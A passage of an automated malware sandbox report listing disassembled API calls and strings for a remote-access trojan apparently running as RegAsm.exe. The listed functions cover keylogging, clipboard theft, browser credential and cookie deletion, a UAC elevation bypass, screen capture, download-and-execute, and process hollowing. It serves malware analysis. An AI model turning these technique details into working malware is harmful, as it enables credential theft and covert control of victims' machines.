                                                                                              APIs
                                                                                              • OpenClipboard.USER32 ref: 004168FD
                                                                                              • EmptyClipboard.USER32 ref: 0041690B
                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                              • CloseClipboard.USER32 ref: 00416990
                                                                                              • OpenClipboard.USER32 ref: 00416997
                                                                                              • GetClipboardData.USER32 ref: 004169A7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                              • String ID: !D@
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                              Similarity
                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                              Similarity
                                                                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0040755C
                                                                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                              Similarity
                                                                                              • API ID: Object_wcslen
                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                              • GetLastError.KERNEL32 ref: 0041A84C
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                              Similarity
                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                              • String ID: JD$JD$JD
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              Similarity
                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                              • String ID: 8SG$PXG$PXG$NG$PG
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                              • GetLastError.KERNEL32 ref: 0040A328
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetMessageA.USER32 ref: 0040A376
                                                                                              • TranslateMessage.USER32(?), ref: 0040A385
                                                                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                              Strings
                                                                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                              • String ID: Keylogger initialization failure: error
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00449292
                                                                                              • _free.LIBCMT ref: 004492B6
                                                                                              • _free.LIBCMT ref: 0044943D
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                              • _free.LIBCMT ref: 00449609
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                              • String ID:
                                                                                              APIs
                                                                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                              • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                              • GetLastError.KERNEL32 ref: 0040BA93
                                                                                              Strings
                                                                                              • UserProfile, xrefs: 0040BA59
                                                                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                              • GetLastError.KERNEL32 ref: 004179D8
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00409293
                                                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                              Similarity
                                                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID: SETTINGS
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004096A5
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040884C
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                              • API ID: DownloadExecuteFileShell
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • API ID: FileFind$FirstNextsend
                                                                                              • String ID: XPG$XPG
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID: p'E$JD
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                              • ExitProcess.KERNEL32 ref: 0044338F
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              APIs
                                                                                              • API ID: Clipboard$CloseDataOpen
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID: JD
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: GetLocaleInfoEx
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                              • API ID: Heap$FreeProcess
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                              APIs
                                                                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                                              • API ID: InfoLocale
                                                                                              APIs
                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                              • GetIconInfo.USER32 ref: 00418FF8
                                                                                              • DeleteObject.GDI32(?), ref: 00419027
                                                                                              • DeleteObject.GDI32(?), ref: 00419034
                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                              • DeleteDC.GDI32(?), ref: 004191B7
                                                                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                              • DeleteDC.GDI32(?), ref: 00419293
                                                                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                              • String ID: DISPLAY
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                              • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
